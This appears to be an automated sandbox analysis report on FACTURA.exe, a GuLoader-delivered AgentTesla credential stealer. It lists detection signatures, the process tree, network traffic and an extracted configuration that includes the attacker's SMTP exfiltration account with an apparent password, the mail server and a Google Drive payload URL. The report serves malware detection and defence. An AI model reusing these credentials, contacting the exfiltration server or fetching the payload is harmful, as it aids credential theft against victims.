Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURA.exe

Overview

General Information

Sample Name:FACTURA.exe
Analysis ID:1644
MD5:d9b54bd175163eae11715a5b89b32aba
SHA1:8a926c701db271e1f2edfec8890a865248e52d24
SHA256:3e123fbdc89e8c9c59a0c5a3a1c2d8fda13f5d8551da654bef2f17f34f578075
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • FACTURA.exe (PID: 9028 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: D9B54BD175163EAE11715A5B89B32ABA)
    • RegAsm.exe (PID: 4060 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 9120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • UserOOBEBroker.exe (PID: 3536 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comnappiboioffice203@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 4060JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 4060JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 4060, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49795

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: conhost.exe.9120.14.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comnappiboioffice203@gmail.com"}
            Antivirus detection for URL or domainShow sources
            Source: http://mail.tccinfaes.comAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: mail.tccinfaes.comVirustotal: Detection: 11%Perma Link
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D209E40 CryptUnprotectData,13_2_1D209E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D20A5C0 CryptUnprotectData,13_2_1D20A5C0
            Source: FACTURA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49788 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: CLARANET-ASClaraNETLTDGB CLARANET-ASClaraNETLTDGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 188.93.227.195 188.93.227.195
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1nf9s1m9q33vpcq2d9i6097uacpkl7/1634134650000/00014782062933200622/*/1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-88-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49795 -> 188.93.227.195:587
            Source: global trafficTCP traffic: 192.168.11.20:49795 -> 188.93.227.195:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 0000000D.00000002.7446378686.000000001E4F6000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpString found in binary or memory: http://PBlDXJ.com
            Source: RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: RegAsm.exe, 0000000D.00000003.2913191774.000000000168D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 0000000D.00000003.2913191774.000000000168D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 0000000D.00000002.7452852422.0000000020693000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
            Source: RegAsm.exe, 0000000D.00000002.7430184056.0000000001680000.00000004.00000020.sdmp, RegAsm.exe, 0000000D.00000003.4040573734.00000000206D9000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.13.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 0000000D.00000002.7430184056.0000000001680000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab9
            Source: RegAsm.exe, 0000000D.00000003.4040573734.00000000206D9000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?711f2b093c59c
            Source: RegAsm.exe, 0000000D.00000002.7452391704.0000000020600000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en1
            Source: RegAsm.exe, 0000000D.00000002.7452852422.0000000020693000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/pA
            Source: RegAsm.exe, 0000000D.00000002.7447125466.000000001E57B000.00000004.00000001.sdmpString found in binary or memory: http://mail.tccinfaes.com
            Source: RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
            Source: RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: UserOOBEBroker.exe, 00000014.00000002.7427039674.000002AEFB9D0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.microso
            Source: RegAsm.exe, 0000000D.00000002.7447125466.000000001E57B000.00000004.00000001.sdmpString found in binary or memory: http://tccinfaes.com
            Source: RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.13.drString found in binary or memory: http://x1.i.lencr.org/
            Source: RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: RegAsm.exe, 0000000D.00000002.7446378686.000000001E4F6000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7447423121.000000001E5A8000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000003.3844182107.000000001D041000.00000004.00000001.sdmpString found in binary or memory: https://AuRruF1eYt.com
            Source: RegAsm.exe, 0000000D.00000002.7446378686.000000001E4F6000.00000004.00000001.sdmpString found in binary or memory: https://AuRruF1eYt.comt-
            Source: RegAsm.exe, 0000000D.00000003.2909576563.00000000016C5000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-88-docs.googleusercontent.com/
            Source: RegAsm.exe, 0000000D.00000003.2913791866.00000000016E5000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-88-docs.googleusercontent.com/%%doc-04-88-docs.googleusercontent.com
            Source: RegAsm.exe, 0000000D.00000002.7429766069.000000000165E000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-88-docs.googleusercontent.com/;
            Source: RegAsm.exe, 0000000D.00000003.2913191774.000000000168D000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000003.2913521401.00000000016C5000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000003.2909576563.00000000016C5000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7430184056.0000000001680000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1nf9s1
            Source: RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/d
            Source: RegAsm.exe, 0000000D.00000003.2913191774.000000000168D000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.7428749510.00000000015D0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ
            Source: RegAsm.exe, 0000000D.00000002.7429027619.0000000001618000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ)
            Source: RegAsm.exe, 0000000D.00000002.7451445570.000000001E96F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 0000000D.00000002.7447486973.000000001E5AF000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 0000000D.00000002.7447486973.000000001E5AF000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 0000000D.00000002.7447486973.000000001E5AF000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 0000000D.00000002.7451445570.000000001E96F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 0000000D.00000002.7445502415.000000001E461000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0o1nf9s1m9q33vpcq2d9i6097uacpkl7/1634134650000/00014782062933200622/*/1AoRiyDm8nMjHXLNPtg05G7x-YPQ0cdIZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-88-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49788 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file
            Source: FACTURA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_004014400_2_00401440
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_0040167C0_2_0040167C
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_0040162F0_2_0040162F
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_00404D2C0_2_00404D2C
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_023370740_2_02337074
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_0233588A0_2_0233588A
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_023362EF0_2_023362EF
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_023369F80_2_023369F8
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_023323FD0_2_023323FD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128113013_2_01281130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128D88013_2_0128D880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128432013_2_01284320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128BA6913_2_0128BA69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01283A5013_2_01283A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128C7B813_2_0128C7B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128026013_2_01280260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128370813_2_01283708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01295F1813_2_01295F18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0129004013_2_01290040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0129A30013_2_0129A300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0129797813_2_01297978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01295EB813_2_01295EB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0178993A13_2_0178993A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0178A59813_2_0178A598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_017878B013_2_017878B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0178C3AD13_2_0178C3AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0178F64013_2_0178F640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01784EB013_2_01784EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0178713013_2_01787130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D20E4E813_2_1D20E4E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D2020C813_2_1D2020C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D202B1613_2_1D202B16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D206E0013_2_1D206E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D20BAA013_2_1D20BAA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D20B1F813_2_1D20B1F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D20CA9813_2_1D20CA98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1DAB6D9013_2_1DAB6D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1DAB07E013_2_1DAB07E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1E295E0813_2_1E295E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1E2953F013_2_1E2953F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1E294ACC13_2_1E294ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1E295DC113_2_1E295DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1E296AF113_2_1E296AF1
            Source: FACTURA.exe, 00000000.00000000.2391132736.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHippa6.exe vs FACTURA.exe
            Source: FACTURA.exeBinary or memory string: OriginalFilenameHippa6.exe vs FACTURA.exe
            Source: C:\Users\user\Desktop\FACTURA.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dllJump to behavior
            Source: FACTURA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FACTURA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\FACTURA.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3DJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeFile created: C:\Users\user\AppData\Local\Temp\~DFC266BF7018E2D972.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@5/5@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9120:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9120:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000000.00000002.2937488053.0000000002330000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_00403F79 push ss; iretd 0_2_00403F85
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_00404B0F push cs; retf 0_2_00404B2B
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_02330CB7 push ebx; retf 0_2_02330CB8
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_02333EC4 push eax; retf 0_2_02333EC9
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_02333D39 push esp; iretd 0_2_02333D3B
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_02333BF0 push dword ptr [esi+7DCF52EFh]; iretd 0_2_02333D0E
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 0_2_02333BF0 push esp; iretd 0_2_02333D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0128F485 pushfd ; iretd 13_2_0128F48A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0129D322 push ds; ret 13_2_0129D336
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0129D322 push ds; ret 13_2_0129D356
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0129D340 push ds; ret 13_2_0129D356
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0178C3AD pushad ; retf 0178h13_2_0178D41D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_01782177 push edi; retn 0000h13_2_01782179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1D201D0A push esp; retf 13_2_1D201D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1E29B142 push ds; ret 13_2_1E29B150
